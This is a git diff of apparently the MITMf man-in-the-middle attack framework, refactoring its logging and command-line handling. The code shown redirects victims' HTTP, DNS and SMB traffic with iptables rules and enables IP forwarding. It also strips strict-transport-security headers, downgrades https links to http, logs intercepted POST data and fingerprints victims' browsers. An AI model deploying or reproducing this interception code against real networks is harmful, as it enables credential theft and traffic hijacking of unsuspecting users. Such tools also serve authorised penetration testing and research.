||||||
|
@ -56,7 +58,7 @@ class ServerConnection(HTTPClient):
|
||||||
self.headers = headers
|
self.headers = headers
|
||||||
self.client = client
|
self.client = client
|
||||||
self.printPostData = True
|
self.printPostData = True
|
||||||
self.clientInfo = None
|
self.clientInfo = {}
|
||||||
self.urlMonitor = URLMonitor.getInstance()
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
self.hsts = URLMonitor.getInstance().hsts
|
self.hsts = URLMonitor.getInstance().hsts
|
||||||
self.app = URLMonitor.getInstance().app
|
self.app = URLMonitor.getInstance().app
|
||||||
|
@ -66,27 +68,18 @@ class ServerConnection(HTTPClient):
|
||||||
self.contentLength = None
|
self.contentLength = None
|
||||||
self.shutdownComplete = False
|
self.shutdownComplete = False
|
||||||
|
|
||||||
def getPostPrefix(self):
|
|
||||||
return "POST"
|
|
||||||
|
|
||||||
def sendRequest(self):
|
def sendRequest(self):
|
||||||
if self.command == 'GET':
|
if self.command == 'GET':
|
||||||
try:
|
|
||||||
user_agent = parse(self.headers['user-agent'])
|
|
||||||
self.clientInfo = (user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
|
|
||||||
mitmf_logger.info("{} [type:{}-{} os:{}] {}".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family, self.headers['host']))
|
|
||||||
except Exception as e:
|
|
||||||
mitmf_logger.debug("[ServerConnection] Unable to parse UA: {}".format(e))
|
|
||||||
mitmf_logger.info("{} Sending request: {}".format(self.client.getClientIP(), self.headers['host']))
|
|
||||||
pass
|
|
||||||
|
|
||||||
mitmf_logger.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri))
|
log.info(self.headers['host'], extra=self.clientInfo)
|
||||||
|
|
||||||
|
log.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri))
|
||||||
|
|
||||||
self.sendCommand(self.command, self.uri)
|
self.sendCommand(self.command, self.uri)
|
||||||
|
|
||||||
def sendHeaders(self):
|
def sendHeaders(self):
|
||||||
for header, value in self.headers.iteritems():
|
for header, value in self.headers.iteritems():
|
||||||
mitmf_logger.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
|
log.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
|
||||||
self.sendHeader(header, value)
|
self.sendHeader(header, value)
|
||||||
|
|
||||||
self.endHeaders()
|
self.endHeaders()
|
||||||
|
@ -96,17 +89,26 @@ class ServerConnection(HTTPClient):
|
||||||
try:
|
try:
|
||||||
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
|
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
|
||||||
if len(postdata) > 0:
|
if len(postdata) > 0:
|
||||||
mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata))
|
log.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
|
if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
|
||||||
mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
|
log.debug("[ServerConnection] {} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))
|
||||||
pass
|
|
||||||
|
|
||||||
self.printPostData = True
|
self.printPostData = True
|
||||||
self.transport.write(self.postData)
|
self.transport.write(self.postData)
|
||||||
|
|
||||||
def connectionMade(self):
|
def connectionMade(self):
|
||||||
mitmf_logger.debug("[ServerConnection] HTTP connection made.")
|
log.debug("[ServerConnection] HTTP connection made.")
|
||||||
|
|
||||||
|
user_agent = parse(self.headers['user-agent'])
|
||||||
|
|
||||||
|
self.clientInfo["clientip"] = self.client.getClientIP()
|
||||||
|
self.clientInfo["clientos"] = user_agent.os.family
|
||||||
|
self.clientInfo["browser"] = user_agent.browser.family
|
||||||
|
try:
|
||||||
|
self.clientInfo["browserv"] = user_agent.browser.version[0]
|
||||||
|
except IndexError:
|
||||||
|
self.clientInfo["browserv"] = "Other"
|
||||||
|
|
||||||
self.plugins.hook()
|
self.plugins.hook()
|
||||||
self.sendRequest()
|
self.sendRequest()
|
||||||
|
@ -123,7 +125,7 @@ class ServerConnection(HTTPClient):
|
||||||
code = values['code']
|
code = values['code']
|
||||||
message = values['message']
|
message = values['message']
|
||||||
|
|
||||||
mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
|
log.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
|
||||||
self.client.setResponseCode(int(code), message)
|
self.client.setResponseCode(int(code), message)
|
||||||
|
|
||||||
def handleHeader(self, key, value):
|
def handleHeader(self, key, value):
|
||||||
|
@ -135,18 +137,15 @@ class ServerConnection(HTTPClient):
|
||||||
if (key.lower() == 'content-type'):
|
if (key.lower() == 'content-type'):
|
||||||
if (value.find('image') != -1):
|
if (value.find('image') != -1):
|
||||||
self.isImageRequest = True
|
self.isImageRequest = True
|
||||||
mitmf_logger.debug("[ServerConnection] Response is image content, not scanning")
|
log.debug("[ServerConnection] Response is image content, not scanning")
|
||||||
|
|
||||||
if (key.lower() == 'content-encoding'):
|
if (key.lower() == 'content-encoding'):
|
||||||
if (value.find('gzip') != -1):
|
if (value.find('gzip') != -1):
|
||||||
mitmf_logger.debug("[ServerConnection] Response is compressed")
|
log.debug("[ServerConnection] Response is compressed")
|
||||||
self.isCompressed = True
|
self.isCompressed = True
|
||||||
|
|
||||||
elif (key.lower()== 'strict-transport-security'):
|
elif (key.lower()== 'strict-transport-security'):
|
||||||
if self.clientInfo is not None:
|
log.info("Zapped a strict-trasport-security header", extra=self.clientInfo)
|
||||||
mitmf_logger.info("{} [type:{}-{} os:{}] Zapped a strict-trasport-security header".format(self.client.getClientIP(), self.clientInfo[0], self.clientInfo[1], self.clientInfo[2]))
|
|
||||||
else:
|
|
||||||
mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP()))
|
|
||||||
|
|
||||||
elif (key.lower() == 'content-length'):
|
elif (key.lower() == 'content-length'):
|
||||||
self.contentLength = value
|
self.contentLength = value
|
||||||
|
@ -161,14 +160,17 @@ class ServerConnection(HTTPClient):
|
||||||
if (self.isImageRequest and self.contentLength != None):
|
if (self.isImageRequest and self.contentLength != None):
|
||||||
self.client.setHeader("Content-Length", self.contentLength)
|
self.client.setHeader("Content-Length", self.contentLength)
|
||||||
|
|
||||||
|
self.client.setHeader("Expires", "0")
|
||||||
|
self.client.setHeader("Cache-Control", "No-Cache")
|
||||||
|
|
||||||
if self.length == 0:
|
if self.length == 0:
|
||||||
self.shutdown()
|
self.shutdown()
|
||||||
|
|
||||||
self.plugins.hook()
|
self.plugins.hook()
|
||||||
|
|
||||||
if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
|
if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
|
||||||
for header, value in self.client.headers.iteritems():
|
for header, value in self.client.headers.iteritems():
|
||||||
mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
|
log.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
|
||||||
|
|
||||||
def handleResponsePart(self, data):
|
def handleResponsePart(self, data):
|
||||||
if (self.isImageRequest):
|
if (self.isImageRequest):
|
||||||
|
@ -180,20 +182,21 @@ class ServerConnection(HTTPClient):
|
||||||
if (self.isImageRequest):
|
if (self.isImageRequest):
|
||||||
self.shutdown()
|
self.shutdown()
|
||||||
else:
|
else:
|
||||||
|
#Gets rid of some generic errors
|
||||||
try:
|
try:
|
||||||
HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
|
HTTPClient.handleResponseEnd(self)
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
def handleResponse(self, data):
|
def handleResponse(self, data):
|
||||||
if (self.isCompressed):
|
if (self.isCompressed):
|
||||||
mitmf_logger.debug("[ServerConnection] Decompressing content...")
|
log.debug("[ServerConnection] Decompressing content...")
|
||||||
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
|
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
|
||||||
|
|
||||||
data = self.replaceSecureLinks(data)
|
data = self.replaceSecureLinks(data)
|
||||||
data = self.plugins.hook()['data']
|
data = self.plugins.hook()['data']
|
||||||
|
|
||||||
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
|
log.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
|
||||||
|
|
||||||
if (self.contentLength != None):
|
if (self.contentLength != None):
|
||||||
self.client.setHeader('Content-Length', len(data))
|
self.client.setHeader('Content-Length', len(data))
|
||||||
|
@ -206,7 +209,7 @@ class ServerConnection(HTTPClient):
|
||||||
try:
|
try:
|
||||||
self.shutdown()
|
self.shutdown()
|
||||||
except:
|
except:
|
||||||
mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
|
log.info("[ServerConnection] Client connection dropped before request finished.")
|
||||||
|
|
||||||
def replaceSecureLinks(self, data):
|
def replaceSecureLinks(self, data):
|
||||||
if self.hsts:
|
if self.hsts:
|
||||||
|
@ -214,7 +217,7 @@ class ServerConnection(HTTPClient):
|
||||||
sustitucion = {}
|
sustitucion = {}
|
||||||
patchDict = self.urlMonitor.patchDict
|
patchDict = self.urlMonitor.patchDict
|
||||||
|
|
||||||
if len(patchDict)>0:
|
if patchDict:
|
||||||
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
|
dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
|
||||||
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
|
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
|
||||||
|
|
||||||
|
@ -222,12 +225,12 @@ class ServerConnection(HTTPClient):
|
||||||
for match in iterator:
|
for match in iterator:
|
||||||
url = match.group()
|
url = match.group()
|
||||||
|
|
||||||
mitmf_logger.debug("[ServerConnection][HSTS] Found secure reference: " + url)
|
log.debug("[ServerConnection][HSTS] Found secure reference: " + url)
|
||||||
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
|
nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
|
||||||
mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
|
log.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
|
||||||
sustitucion[url] = nuevaurl
|
sustitucion[url] = nuevaurl
|
||||||
|
|
||||||
if len(sustitucion)>0:
|
if sustitucion:
|
||||||
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
|
dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
|
||||||
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
|
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
|
||||||
|
|
||||||
|
@ -240,11 +243,11 @@ class ServerConnection(HTTPClient):
|
||||||
for match in iterator:
|
for match in iterator:
|
||||||
url = match.group()
|
url = match.group()
|
||||||
|
|
||||||
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
|
log.debug("[ServerConnection] Found secure reference: " + url)
|
||||||
|
|
||||||
url = url.replace('https://', 'http://', 1)
|
url = url.replace('https://', 'http://', 1)
|
||||||
url = url.replace('&', '&')
|
url = url.replace('&', '&')
|
||||||
self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
|
self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
|
||||||
|
|
||||||
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
|
data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
|
||||||
return re.sub(ServerConnection.urlType, 'http://', data)
|
return re.sub(ServerConnection.urlType, 'http://', data)
|
||||||
|
|
|
@ -17,9 +17,10 @@
|
||||||
#
|
#
|
||||||
|
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
from twisted.internet.protocol import ClientFactory
|
from twisted.internet.protocol import ClientFactory
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mimtf')
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
class ServerConnectionFactory(ClientFactory):
|
class ServerConnectionFactory(ClientFactory):
|
||||||
|
|
||||||
|
@ -34,12 +35,12 @@ class ServerConnectionFactory(ClientFactory):
|
||||||
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
|
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
|
||||||
|
|
||||||
def clientConnectionFailed(self, connector, reason):
|
def clientConnectionFailed(self, connector, reason):
|
||||||
mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.")
|
log.debug("[ServerConnectionFactory] Server connection failed.")
|
||||||
|
|
||||||
destination = connector.getDestination()
|
destination = connector.getDestination()
|
||||||
|
|
||||||
if (destination.port != 443):
|
if (destination.port != 443):
|
||||||
mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL")
|
log.debug("[ServerConnectionFactory] Retrying via SSL")
|
||||||
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
|
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
|
|
|
@ -18,9 +18,10 @@
|
||||||
|
|
||||||
import re, os
|
import re, os
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
from core.configwatcher import ConfigWatcher
|
from core.configwatcher import ConfigWatcher
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mimtf')
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
class URLMonitor:
|
class URLMonitor:
|
||||||
|
|
||||||
|
@ -57,7 +58,7 @@ class URLMonitor:
|
||||||
|
|
||||||
#This is here because I'm lazy
|
#This is here because I'm lazy
|
||||||
def getResolverPort(self):
|
def getResolverPort(self):
|
||||||
return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port'])
|
return int(ConfigWatcher().config['MITMf']['DNS']['port'])
|
||||||
|
|
||||||
def isSecureLink(self, client, url):
|
def isSecureLink(self, client, url):
|
||||||
for expression in URLMonitor.javascriptTrickery:
|
for expression in URLMonitor.javascriptTrickery:
|
||||||
|
@ -78,7 +79,7 @@ class URLMonitor:
|
||||||
s.add(to_url)
|
s.add(to_url)
|
||||||
return
|
return
|
||||||
url_set = set([from_url, to_url])
|
url_set = set([from_url, to_url])
|
||||||
mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set))
|
log.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set))
|
||||||
self.redirects.append(url_set)
|
self.redirects.append(url_set)
|
||||||
|
|
||||||
def getRedirectionSet(self, url):
|
def getRedirectionSet(self, url):
|
||||||
|
@ -119,7 +120,7 @@ class URLMonitor:
|
||||||
else:
|
else:
|
||||||
self.sustitucion[host] = "web"+host
|
self.sustitucion[host] = "web"+host
|
||||||
self.real["web"+host] = host
|
self.real["web"+host] = host
|
||||||
mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))
|
log.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.sustitucion[host]))
|
||||||
|
|
||||||
url = 'http://' + host + path
|
url = 'http://' + host + path
|
||||||
|
|
||||||
|
@ -155,14 +156,14 @@ class URLMonitor:
|
||||||
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
|
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
|
||||||
|
|
||||||
def URLgetRealHost(self, host):
|
def URLgetRealHost(self, host):
|
||||||
mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host))
|
log.debug("[URLMonitor][HSTS] Parsing host: {}".format(host))
|
||||||
|
|
||||||
self.updateHstsConfig()
|
self.updateHstsConfig()
|
||||||
|
|
||||||
if self.real.has_key(host):
|
if self.real.has_key(host):
|
||||||
mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.real[host]))
|
log.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.real[host]))
|
||||||
return self.real[host]
|
return self.real[host]
|
||||||
|
|
||||||
else:
|
else:
|
||||||
mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host))
|
log.debug("[URLMonitor][HSTS] Host not in list: {}".format(host))
|
||||||
return host
|
return host
|
||||||
|
|
|
@ -25,22 +25,23 @@ import logging
|
||||||
import re
|
import re
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
|
||||||
from scapy.all import get_if_addr, get_if_hwaddr
|
|
||||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||||
|
from scapy.all import get_if_addr, get_if_hwaddr
|
||||||
|
|
||||||
|
log = logging.getLogger('mitmf')
|
||||||
|
|
||||||
def shutdown(message=None):
|
def shutdown(message=None):
|
||||||
for plugin in ProxyPlugins.getInstance().plist:
|
for plugin in ProxyPlugins.getInstance().plist:
|
||||||
plugin.finish()
|
plugin.on_shutdown()
|
||||||
sys.exit(message)
|
sys.exit(message)
|
||||||
|
|
||||||
class SystemConfig:
|
class SystemConfig:
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def setIpForwarding(value):
|
def setIpForwarding(value):
|
||||||
mitmf_logger.debug("[Utils] Setting ip forwarding to {}".format(value))
|
log.debug("[Utils] Setting ip forwarding to {}".format(value))
|
||||||
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
|
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
|
||||||
file.write(str(value))
|
file.write(str(value))
|
||||||
file.close()
|
file.close()
|
||||||
|
@ -53,7 +54,7 @@ class SystemConfig:
|
||||||
shutdown("[Utils] Interface {} does not have an assigned IP address".format(interface))
|
shutdown("[Utils] Interface {} does not have an assigned IP address".format(interface))
|
||||||
|
|
||||||
return ip_address
|
return ip_address
|
||||||
except Exception, e:
|
except Exception as e:
|
||||||
shutdown("[Utils] Error retrieving IP address from {}: {}".format(interface, e))
|
shutdown("[Utils] Error retrieving IP address from {}: {}".format(interface, e))
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -81,23 +82,23 @@ class IpTables:
|
||||||
return IpTables._instance
|
return IpTables._instance
|
||||||
|
|
||||||
def Flush(self):
|
def Flush(self):
|
||||||
mitmf_logger.debug("[Utils] Flushing iptables")
|
log.debug("[Utils] Flushing iptables")
|
||||||
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
|
||||||
self.dns = False
|
self.dns = False
|
||||||
self.http = False
|
self.http = False
|
||||||
|
|
||||||
def HTTP(self, http_redir_port):
|
def HTTP(self, http_redir_port):
|
||||||
mitmf_logger.debug("[Utils] Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
|
log.debug("[Utils] Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port))
|
||||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
|
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port))
|
||||||
self.http = True
|
self.http = True
|
||||||
|
|
||||||
def DNS(self, dns_redir_port):
|
def DNS(self, dns_redir_port):
|
||||||
mitmf_logger.debug("[Utils] Setting iptables DNS redirection rule from port 53 to {}".format(dns_redir_port))
|
log.debug("[Utils] Setting iptables DNS redirection rule from port 53 to {}".format(dns_redir_port))
|
||||||
os.system('iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port {}'.format(dns_redir_port))
|
os.system('iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port {}'.format(dns_redir_port))
|
||||||
self.dns = True
|
self.dns = True
|
||||||
|
|
||||||
def SMB(self, smb_redir_port):
|
def SMB(self, smb_redir_port):
|
||||||
mitmf_logger.debug("[Utils] Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
|
log.debug("[Utils] Setting iptables SMB redirection rule from port 445 to {}".format(smb_redir_port))
|
||||||
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 445 -j REDIRECT --to-port {}'.format(smb_redir_port))
|
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 445 -j REDIRECT --to-port {}'.format(smb_redir_port))
|
||||||
self.smb = True
|
self.smb = True
|
||||||
|
|
||||||
|
@ -163,6 +164,6 @@ class Banners:
|
||||||
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝
|
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def printBanner(self):
|
def get_banner(self):
|
||||||
banners = [self.banner1, self.banner2, self.banner3, self.banner4, self.banner5]
|
banners = [self.banner1, self.banner2, self.banner3, self.banner4, self.banner5]
|
||||||
print random.choice(banners)
|
return random.choice(banners)
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Subproject commit 0bd3429e6775395c3522046ab21193a36ab2e0fe
|
Subproject commit 6fcff6bdb511ca306ec9ad29872342086714dd1d
|
158
mitmf.py
158
mitmf.py
|
@ -18,158 +18,102 @@
|
||||||
# USA
|
# USA
|
||||||
#
|
#
|
||||||
|
|
||||||
|
import logging
|
||||||
import argparse
|
import argparse
|
||||||
import sys
|
import sys
|
||||||
import os
|
import os
|
||||||
import logging
|
|
||||||
import threading
|
import threading
|
||||||
|
|
||||||
from twisted.web import http
|
from twisted.web import http
|
||||||
from twisted.internet import reactor
|
from twisted.internet import reactor
|
||||||
from core.sslstrip.CookieCleaner import CookieCleaner
|
|
||||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
|
||||||
from core.utils import Banners, SystemConfig, shutdown
|
from core.utils import Banners, SystemConfig, shutdown
|
||||||
|
from core.logger import logger
|
||||||
|
|
||||||
from plugins import *
|
from plugins import *
|
||||||
|
|
||||||
Banners().printBanner()
|
print Banners().get_banner()
|
||||||
|
|
||||||
if os.geteuid() != 0:
|
if os.geteuid() != 0:
|
||||||
sys.exit("[-] When man-in-the-middle you want, run as r00t you will, hmm?")
|
sys.exit("[-] The derp is strong with this one")
|
||||||
|
|
||||||
mitmf_version = "0.9.7"
|
parser = argparse.ArgumentParser(description="MITMf v0.9.8 - 'The Dark Side'", version="0.9.8 - 'The Dark Side'", usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.")
|
||||||
sslstrip_version = "0.9"
|
|
||||||
sergio_version = "0.2.1"
|
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
|
|
||||||
|
|
||||||
#add MITMf options
|
#add MITMf options
|
||||||
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
||||||
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
||||||
mgroup.add_argument("-i", "--interface", required=True, type=str, metavar="interface" ,help="Interface to listen on")
|
mgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
|
||||||
mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.conf", metavar='configfile', help="Specify config file to use")
|
mgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
|
||||||
mgroup.add_argument('-m', '--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
|
mgroup.add_argument('-m', '--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
|
||||||
|
|
||||||
#add sslstrip options
|
#Add sslstrip options
|
||||||
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
|
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
|
||||||
slogopts = sgroup.add_mutually_exclusive_group()
|
slogopts = sgroup.add_mutually_exclusive_group()
|
||||||
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
|
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
|
||||||
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
|
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
|
||||||
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
|
|
||||||
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
|
|
||||||
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
|
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
|
||||||
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
||||||
|
|
||||||
#Initialize plugins
|
#Initialize plugins and pass them the parser NameSpace object
|
||||||
plugin_classes = plugin.Plugin.__subclasses__()
|
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]
|
||||||
|
|
||||||
plugins = []
|
if len(sys.argv) == 1:
|
||||||
try:
|
|
||||||
for p in plugin_classes:
|
|
||||||
plugins.append(p())
|
|
||||||
except Exception as e:
|
|
||||||
print "[-] Failed to load plugin class {}: {}".format(p, e)
|
|
||||||
|
|
||||||
|
|
||||||
arg_dict = dict() #dict containing a plugin's optname with it's relative options
|
|
||||||
|
|
||||||
#Give subgroup to each plugin with options
|
|
||||||
try:
|
|
||||||
for p in plugins:
|
|
||||||
if p.desc == "":
|
|
||||||
sgroup = parser.add_argument_group(p.name,"Options for {}.".format(p.name))
|
|
||||||
else:
|
|
||||||
sgroup = parser.add_argument_group(p.name, p.desc)
|
|
||||||
|
|
||||||
sgroup.add_argument("--{}".format(p.optname), action="store_true",help="Load plugin {}".format(p.name))
|
|
||||||
|
|
||||||
if p.has_opts:
|
|
||||||
p.pluginOptions(sgroup)
|
|
||||||
|
|
||||||
arg_dict[p.optname] = vars(sgroup)['_group_actions']
|
|
||||||
|
|
||||||
except NotImplementedError:
|
|
||||||
sys.exit("[-] {} plugin claimed option support, but didn't have it.".format(p.name))
|
|
||||||
|
|
||||||
if len(sys.argv) is 1:
|
|
||||||
parser.print_help()
|
parser.print_help()
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
args = parser.parse_args()
|
options = parser.parse_args()
|
||||||
|
|
||||||
# Definitely a better way to do this, will need to clean this up in the future
|
#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
|
||||||
# Checks to see if we called a plugin's options without first invoking the actual plugin
|
options.ip = SystemConfig.getIP(options.interface)
|
||||||
for plugin, options in arg_dict.iteritems():
|
options.mac = SystemConfig.getMAC(options.interface)
|
||||||
if vars(args)[plugin] is False:
|
|
||||||
for option in options:
|
|
||||||
if vars(args)[option.dest]:
|
|
||||||
sys.exit("[-] Called plugin options without invoking the actual plugin (--{})".format(plugin))
|
|
||||||
|
|
||||||
#check to see if we supplied a valid interface
|
#Set the log level
|
||||||
myip = SystemConfig.getIP(args.interface)
|
logger().log_level = logging.__dict__[options.log_level.upper()]
|
||||||
mymac = SystemConfig.getMAC(args.interface)
|
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
|
log = logger().setup_logger('mitmf', formatter)
|
||||||
|
|
||||||
#Start logging
|
from core.sslstrip.CookieCleaner import CookieCleaner
|
||||||
log_level = logging.__dict__[args.log_level.upper()]
|
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||||
|
|
||||||
logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
|
||||||
logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
|
||||||
mitmf_logger = logging.getLogger('mitmf')
|
|
||||||
fileHandler = logging.FileHandler("./logs/mitmf.log")
|
|
||||||
fileHandler.setFormatter(logFormatter)
|
|
||||||
mitmf_logger.addHandler(fileHandler)
|
|
||||||
|
|
||||||
#####################################################################################################
|
|
||||||
|
|
||||||
#All our options should be loaded now, initialize the plugins
|
|
||||||
print "[*] MITMf v{} online... initializing plugins".format(mitmf_version)
|
|
||||||
|
|
||||||
for p in plugins:
|
|
||||||
|
|
||||||
#load only the plugins that have been called at the command line
|
|
||||||
if vars(args)[p.optname] is True:
|
|
||||||
|
|
||||||
print "|_ {} v{}".format(p.name, p.version)
|
|
||||||
if p.tree_info:
|
|
||||||
for line in xrange(0, len(p.tree_info)):
|
|
||||||
print "| |_ {}".format(p.tree_info.pop())
|
|
